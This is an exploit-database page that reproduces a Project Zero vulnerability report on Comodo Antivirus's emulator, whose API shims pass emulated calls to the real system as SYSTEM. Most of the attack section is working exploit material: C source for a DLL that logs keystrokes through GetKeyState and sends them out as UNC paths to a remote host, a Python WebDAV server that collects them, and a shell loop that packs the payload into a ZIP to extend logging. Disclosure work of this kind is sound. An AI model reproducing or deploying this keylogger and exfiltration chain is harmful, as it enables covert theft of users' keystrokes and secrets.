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Memory Corruption Issues in Comodo Antivirus Emulator - exploit.company
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vendor:
Comodo Antivirus
by:
7.5
CVSS
HIGH
Memory Corruption
CWE
Product Name: Comodo Antivirus
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Memory Corruption Issues in Comodo Antivirus Emulator

The x86 emulator in Comodo Antivirus can be exploited by triggering emulation through methods like sending an email or visiting a website. The emulator has memory corruption issues and also implements shims for Win32 API calls, some of which run as NT AUTHORITYSYSTEM. One example is the USER32!GetKeyState shim.

Mitigation:

Apply the latest patches and updates for Comodo Antivirus. Avoid visiting suspicious websites or opening email attachments from unknown sources.
Source

Exploit-DB raw data:

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=769

Comodo Antivirus includes a x86 emulator that is used to unpack and monitor obfuscated executables, this is common practice among antivirus products. The idea is that emulators can run the code safely for a short time, giving the sample enough time to unpack itself or do something that can be profiled. Needless to say, this is a very significant and complicated attack surface, as an attacker can trigger emulation simply by sending the victim an email or getting them to visit a website with zero user interaction.

I've found some memory corruption issues with the emulator, but Comodo also implement hundreds of shims for Win32 API calls, so that things like CreateFile, LoadLibrary, and so on appear to work to the emulated code. Astonishingly, some of these shims simply extract the parameters from the emulated address space and pass them directly to the real API, while running as NT AUTHORITY\SYSTEM. The results are then poked back in to the emulator, and the code continues.

The possible attacks here are too numerous to mention.

Here are some of the more obvious mistakes, let's start with USER32!GetKeyState (wtf!!!!). Here is the emulator shim from mach32.dll:

.text:1001D9A0                sub_1001D9A0    proc near               ; DATA XREF: .data:1016B10C31o
.text:1001D9A0
.text:1001D9A0                arg_0           = dword ptr  8
.text:1001D9A0
.text:1001D9A0 55                             push    ebp
.text:1001D9A1 8B EC                          mov     ebp, esp
.text:1001D9A3 8B 45 08                       mov     eax, [ebp+arg_0]  ; pVMClass
.text:1001D9A6 8B 08                          mov     ecx, [eax]        ; vtbl
.text:1001D9A8 8B 91 98 00 00+                mov     edx, [ecx+98h]    ; VArg2Rarg
.text:1001D9AE 6A 00                          push    0
.text:1001D9B0 6A 06                          push    6                 ; TypeDword
.text:1001D9B2 6A 01                          push    1                 ; ParamNum
.text:1001D9B4 50                             push    eax               ; this
.text:1001D9B5 FF D2                          call    edx               ; VArg2Rarg(pVMClass, 1, TypeDword, 0); Virtual Arg to Real Arg
.text:1001D9B7 50                             push    eax             ; nVirtKey
.text:1001D9B8 FF 15 F4 62 07+                call    ds:GetKeyState    ; Extract parameter from emulator, then return the real value (!!!)
.text:1001D9BE 98                             cwde
.text:1001D9BF 5D                             pop     ebp
.text:1001D9C0 C3                             retn
.text:1001D9C0                sub_1001D9A0    endp


The emulated code can query the real keyboard state (!!!).

I've found that the simplest method of triggering the emulation is to create a DLL with a writable text section. An attacker would also need a way to exfiltrate the monitored keystrokes out of the emulator, but I've found that the shim for kernel32!SetCurrentDirectoryA actually calls GetFileAttributes() on the specified parameter, so you can encode it as a UNC path and send it over the network to your control server. This doesn't require any user interaction.

To reproduce this bug, first, create a DLL like this:

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "KERNEL32")
#pragma comment(lib, "USER32")

// This is required to trigger the generic unpacker in comodo.
#pragma comment(linker, "/SECTION:.text,ERW")

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    char path[128];
    char *ptr;

    ZeroMemory(path, sizeof path);

    ptr  = strcpy(path, "\\\\?\\UNC\\192.168.237.1\\");
    ptr += strlen(ptr);

    SetCurrentDirectory(path);

    for (;;) {
        for (*ptr = 'A'; *ptr <= 'Z'; (*ptr)++) {
            if (GetKeyState(*ptr) & 0x8000) {
                SetCurrentDirectory(path);
            }
        }
    }

    return TRUE;
}

Then run a minimal WebDAV server like this on the remote host:

#!/usr/bin/env python
import SimpleHTTPServer
import SocketServer

class WebDavHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header('Allow', 'OPTIONS, GET, PROPFIND')
        self.send_header('DAV', '1, 2')
        self.end_headers()
        self.connection.shutdown(1)

    def do_PROPFIND(self):
        self.send_response(207)
        self.send_header('Content-type', 'text/xml')
        self.end_headers()
        self.wfile.write('<?xml version="1.0"?><a:multistatus xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/" xmlns:c="xml:" xmlns:a="DAV:"><a:response></a:response></a:multistatus>')
        self.connection.shutdown(1)


SocketServer.TCPServer(('0.0.0.0', 80), WebDavHandler).serve_forever()

You only get a few seconds of logging per scan, but you can duplicate the payload thousands of times into a ZIP archive for effectively unlimited scan time. Something like this:

$ for ((i=0;i<1024;i++)); do cp keystroke.dll $i.dll; zip keystroke.zip $i.dll; rm -f $i.dll; done

Now scanning that zip file will send all keystrokes to the WebDAV server for approximately ten or so minutes (please note, there's no reason this can't be extended indefinitely), see screenshot for reference.

This is not the only attack possible, you can also extract, delete, query and use cryptographic keys, smartcards and other security hardware, because calls to CAPI routines like are all passed directly through to the real API:

ADVAPI32!CryptAcquireContextA
ADVAPI32!CryptDecrypt
ADVAPI32!CryptDeriveKey
ADVAPI32!CryptCreateHash .. and so on.

Any secrets stored in the registry are also exposed to attackers via RegQueryValueEx and GetProfileInt among others, all passed directly through to the real API. The list of possible attacks here is simply too long to enumerate, any competent developer can see this is a colossal mistake that needs to be remedied urgently.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39599.zip